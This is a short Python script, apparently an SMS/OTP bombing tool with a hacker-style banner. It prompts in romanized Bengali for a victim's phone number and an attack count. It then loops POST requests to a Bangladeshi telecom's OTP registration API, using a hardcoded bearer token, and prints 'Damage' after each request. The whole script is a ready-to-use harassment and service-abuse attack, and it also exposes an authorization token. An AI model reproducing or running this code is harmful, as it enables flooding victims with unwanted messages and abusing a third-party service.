import requests
from requests.structures import CaseInsensitiveDict

green = '\033[1;32m'
end = '\033[0m'
print (green+"""  _ _____                         
 (_)_   _|___                     
 | | | ||_  /                     
 | | | | / /                      
 |_| |_|/___|                     
  ____        ____  _ _   _       
 |  _ \ _   _|  _ \(_) \ | | __ _ 
 | |_) | | | | | | | |  \| |/ _` |
 |  __/| |_| | |_| | | |\  | (_| |
 |_|    \__,_|____/|_|_| \_|\__,_|
                                  """+end)


# CVALUE
blue = '\33[94m'
lightblue = '\033[94m'
red = '\033[91m'
white = '\33[97m'
yellow = '\33[93m'
green = '\033[1;32m'
cyan = "\033[96m"
end = '\033[0m'
print ("\033[32m")

number  = str(input("[>] apNar aTTack NumBer DiN: "))




amount = int(input("[>] apNar aTTack ar PoriMaN LikHuN: "))

url = "https://webapi.robi.com.bd/v1/account/register/otp"

headers = CaseInsensitiveDict()
headers["Content-Type"] = "application/json;charset=utf-8"
headers["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1MjM4NjUyNCwiZXhwIjoxNjUyNDcyOTI0LCJuYmYiOjE2NTIzODY1MjQsImp0aSI6IjV0TDVxbFFrM25tOTRDcTYiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.X1Q6rdBIhRb9AegxImb6O1DasiBMxuh6rczAeWuwnVw"



data = '{"phone":"+88'+number+'"}'


for i in range(amount):

	resp = requests.post(url, headers=headers, data=data)
	
	print(str (i+1)+" Damage \n")


